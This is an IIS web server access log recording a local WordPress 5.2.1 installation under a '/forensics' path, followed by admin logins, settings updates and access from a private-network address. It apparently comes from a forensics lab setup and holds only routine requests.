#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2020-07-08 13:20:19
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-07-08 13:20:19 ::1 GET /forensics - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 - 301 0 0 3000
2020-07-08 13:20:30 ::1 GET /forensics/ - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 - 302 0 0 11091
2020-07-08 13:20:43 ::1 GET /forensics/wp-admin/install.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 - 200 0 0 12721
2020-07-08 13:20:43 ::1 GET /forensics/wp-admin/js/language-chooser.min.js ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php 200 0 0 172
2020-07-08 13:20:43 ::1 GET /forensics/wp-includes/css/dashicons.min.css ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php 200 0 0 196
2020-07-08 13:20:43 ::1 GET /forensics/wp-includes/css/buttons.min.css ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php 200 0 0 261
2020-07-08 13:20:43 ::1 GET /forensics/wp-includes/js/jquery/jquery-migrate.min.js ver=1.4.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php 200 0 0 258
2020-07-08 13:20:43 ::1 GET /forensics/wp-admin/css/install.min.css ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php 200 0 0 259
2020-07-08 13:20:43 ::1 GET /forensics/wp-includes/js/jquery/jquery.js ver=1.12.4-wp 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php 200 0 0 266
2020-07-08 13:20:48 ::1 GET /forensics/wp-admin/images/spinner.gif - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/css/install.min.css?ver=5.2.1 200 0 0 10
2020-07-08 13:20:48 ::1 GET /forensics/wp-admin/images/wordpress-logo.svg ver=20131107 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/css/install.min.css?ver=5.2.1 200 0 0 11
2020-07-08 13:20:48 ::1 GET /favicon.ico - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php 404 0 2 164
2020-07-08 13:20:54 ::1 POST /forensics/wp-admin/install.php step=1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php 200 0 0 1890
2020-07-08 13:20:54 ::1 GET /forensics/wp-admin/js/password-strength-meter.min.js ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php?step=1 200 0 0 2
2020-07-08 13:20:54 ::1 GET /forensics/wp-includes/js/zxcvbn-async.min.js ver=1.0 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php?step=1 200 0 0 2
2020-07-08 13:20:54 ::1 GET /forensics/wp-includes/js/wp-util.min.js ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php?step=1 200 0 0 14
2020-07-08 13:20:54 ::1 GET /forensics/wp-includes/js/underscore.min.js ver=1.8.3 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php?step=1 200 0 0 30
2020-07-08 13:20:54 ::1 GET /forensics/wp-admin/js/user-profile.min.js ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php?step=1 200 0 0 30
2020-07-08 13:20:54 ::1 GET /forensics/wp-includes/js/zxcvbn.min.js - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php?step=1 200 0 0 42
2020-07-08 13:21:35 ::1 POST /forensics/wp-admin/install.php step=2 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php?step=1 200 0 0 1764
2020-07-08 13:21:51 ::1 GET /forensics/2020/07/08/hello-world/ - 80 - ::1 WordPress/5.2.1;+http://localhost/forensics http://localhost/forensics/2020/07/08/hello-world/ 404 0 2 1
2020-07-08 13:21:54 ::1 GET /forensics/index.php/2020/07/08/hello-world/ - 80 - ::1 WordPress/5.2.1;+http://localhost/forensics http://localhost/forensics/index.php/2020/07/08/hello-world/ 200 0 0 2709
2020-07-08 13:21:55 ::1 POST /forensics/wp-admin/install.php step=2 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php?step=2 200 0 0 6627
2020-07-08 13:22:00 ::1 GET /forensics/wp-login.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/install.php?step=2 200 0 0 1499
2020-07-08 13:22:00 ::1 GET /forensics/wp-admin/css/forms.min.css ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-login.php 200 0 0 2
2020-07-08 13:22:00 ::1 GET /forensics/wp-admin/css/l10n.min.css ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-login.php 200 0 0 11
2020-07-08 13:22:00 ::1 GET /forensics/wp-admin/css/login.min.css ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-login.php 200 0 0 14
2020-07-08 13:22:08 ::1 POST /forensics/wp-cron.php doing_wp_cron=1594214513.2021501064300537109375 80 - ::1 WordPress/5.2.1;+http://localhost/forensics http://localhost/forensics/wp-cron.php?doing_wp_cron=1594214513.2021501064300537109375 200 0 64 15037
2020-07-08 13:22:11 ::1 POST /forensics/wp-login.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-login.php 302 0 0 1480
2020-07-08 13:22:17 ::1 GET /forensics/wp-admin/ - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-login.php 200 0 0 5758
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/thickbox/thickbox.css ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 21
2020-07-08 13:22:17 ::1 GET /forensics/wp-admin/load-scripts.php c=0&load%5B%5D=jquery-core,jquery-migrate,utils&ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 48
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/css/editor.min.css ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 9
2020-07-08 13:22:17 ::1 GET /forensics/wp-admin/load-styles.php c=0&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check&ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 100
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/dist/vendor/wp-polyfill.min.js ver=7.0.0 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 6
2020-07-08 13:22:17 ::1 GET /forensics/wp-admin/load-scripts.php c=0&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,underscore,wp-util,wp-a11y,dashboard,thickbox,plugin-install,updates,shortc&load%5B%5D=ode,media-upload,svg-painter&ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 118
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/wp-auth-check.min.js ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 28
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/dist/hooks.min.js ver=2.2.0 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 28
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/heartbeat.min.js ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 28
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/jquery/ui/position.min.js ver=1.11.4 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 26
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/jquery/ui/menu.min.js ver=1.11.4 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 27
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/wplink.min.js ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 27
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/wp-emoji-release.min.js ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 20
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/jquery/ui/autocomplete.min.js ver=1.11.4 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 28
2020-07-08 13:22:17 ::1 GET /forensics/wp-includes/js/thickbox/loadingAnimation.gif - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 7
2020-07-08 13:22:19 ::1 GET /forensics/wp-admin/admin-ajax.php action=wp-compression-test&test=1&_ajax_nonce=f33733bf19&1594214538010 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1830
2020-07-08 13:22:21 ::1 POST /forensics/wp-cron.php doing_wp_cron=1594214539.6762290000915527343750 80 - ::1 WordPress/5.2.1;+http://localhost/forensics http://localhost/forensics/wp-cron.php?doing_wp_cron=1594214539.6762290000915527343750 200 0 64 1608
2020-07-08 13:22:21 ::1 GET /forensics/wp-admin/admin-ajax.php action=wp-compression-test&test=2&_ajax_nonce=f33733bf19&1594214539851 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1485
2020-07-08 13:22:21 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 3756
2020-07-08 13:22:22 ::1 GET /forensics/wp-admin/admin-ajax.php action=wp-compression-test&test=yes&_ajax_nonce=f33733bf19&1594214541343 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1452
2020-07-08 13:22:39 ::1 GET /forensics/wp-admin/admin-ajax.php action=dashboard-widgets&widget=dashboard_primary&pagenow=dashboard 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 21727
2020-07-08 13:22:50 192.168.198.142 GET /forensics - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 - 301 0 0 27
2020-07-08 13:22:51 192.168.198.142 GET /forensics/ - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 - 200 0 0 1415
2020-07-08 13:22:57 192.168.198.142 GET /favicon.ico - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 http://192.168.198.142/forensics/ 404 0 2 69
2020-07-08 13:23:05 192.168.198.142 GET /forensics/wp-admin - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 - 301 0 0 11
2020-07-08 13:23:07 192.168.198.142 GET /forensics/wp-admin/ - 80 - 192.168.198.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/84.0.4147.68+Safari/537.36+Edg/84.0.522.28 - 302 0 0 1539
2020-07-08 13:23:20 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1464
2020-07-08 13:23:57 192.168.198.142 GET /forensics/wpadmin - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 - 404 0 2 2
2020-07-08 13:23:57 192.168.198.142 GET /favicon.ico - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wpadmin 404 0 2 5
2020-07-08 13:24:06 192.168.198.142 GET /forensics/wp-admin - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 - 301 0 0 1
2020-07-08 13:24:07 192.168.198.142 GET /forensics/wp-admin/ - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 - 302 0 0 1490
2020-07-08 13:24:08 ::1 GET /forensics/wp-login.php redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 - 200 0 0 1411
2020-07-08 13:24:20 ::1 POST /forensics/wp-login.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-login.php?redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 302 0 0 1526
2020-07-08 13:24:21 ::1 GET /forensics/wp-admin/ - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-login.php?redirect_to=http%3A%2F%2F192.168.198.142%2Fforensics%2Fwp-admin%2F&reauth=1 200 0 0 1596
2020-07-08 13:24:21 ::1 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 50
2020-07-08 13:24:21 ::1 GET /forensics/wp-admin/load-styles.php c=1&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check&ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 70
2020-07-08 13:24:21 ::1 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,underscore,wp-util,wp-a11y,dashboard,thickbox,plugin-install,updates,shortc&load%5B%5D=ode,media-upload,svg-painter&ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 93
2020-07-08 13:24:25 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 2932
2020-07-08 13:24:28 ::1 GET /forensics/wp-admin/options-general.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 64 4006
2020-07-08 13:24:28 ::1 GET /forensics/wp-admin/options-general.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 3137
2020-07-08 13:24:28 ::1 GET /forensics/wp-admin/load-scripts.php c=1&load%5B%5D=hoverIntent,common,admin-bar,svg-painter&ver=5.2.1 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/options-general.php 200 0 0 41
2020-07-08 13:25:07 ::1 POST /forensics/wp-admin/options.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/options-general.php 302 0 0 1758
2020-07-08 13:25:09 ::1 GET /forensics/wp-admin/options-general.php settings-updated=true 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/options-general.php 302 0 0 1491
2020-07-08 13:25:10 192.168.198.142 GET /forensics/wp-login.php redirect_to=http%3A%2F%2Flocalhost%2Fforensics%2Fwp-admin%2Foptions-general.php%3Fsettings-updated%3Dtrue&reauth=1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/ 200 0 0 1413
2020-07-08 13:25:10 192.168.198.142 GET /forensics/wp-admin/css/l10n.min.css ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%2Fforensics%2Fwp-admin%2Foptions-general.php%3Fsettings-updated%3Dtrue&reauth=1 200 0 0 10
2020-07-08 13:25:10 192.168.198.142 GET /forensics/wp-includes/css/dashicons.min.css ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%2Fforensics%2Fwp-admin%2Foptions-general.php%3Fsettings-updated%3Dtrue&reauth=1 200 0 0 21
2020-07-08 13:25:10 192.168.198.142 GET /forensics/wp-admin/css/forms.min.css ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%2Fforensics%2Fwp-admin%2Foptions-general.php%3Fsettings-updated%3Dtrue&reauth=1 200 0 0 25
2020-07-08 13:25:10 192.168.198.142 GET /forensics/wp-admin/css/login.min.css ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%2Fforensics%2Fwp-admin%2Foptions-general.php%3Fsettings-updated%3Dtrue&reauth=1 200 0 0 25
2020-07-08 13:25:10 192.168.198.142 GET /forensics/wp-includes/css/buttons.min.css ver=5.2.1 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%2Fforensics%2Fwp-admin%2Foptions-general.php%3Fsettings-updated%3Dtrue&reauth=1 200 0 0 25
2020-07-08 13:25:10 192.168.198.142 GET /forensics/wp-admin/images/wordpress-logo.svg ver=20131107 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-admin/css/login.min.css?ver=5.2.1 200 0 0 4
2020-07-08 13:25:20 ::1 POST /forensics/wp-admin/admin-ajax.php - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1502
2020-07-08 13:25:20 ::1 GET /forensics/wp-includes/images/spinner.gif - 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check&ver=5.2.1 200 0 0 1
2020-07-08 13:25:21 192.168.198.142 POST /forensics/wp-login.php - 80 - 192.168.198.142 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://192.168.198.142/forensics/wp-login.php?redirect_to=http%3A%2F%2Flocalhost%2Fforensics%2Fwp-admin%2Foptions-general.php%3Fsettings-updated%3Dtrue&reauth=1 302 0 0 1570
2020-07-08 13:25:21 ::1 GET /forensics/wp-login.php interim-login=1&wp_lang=en_US 80 - ::1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.116+Safari/537.36 http://localhost/forensics/wp-admin/ 200 0 0 1436
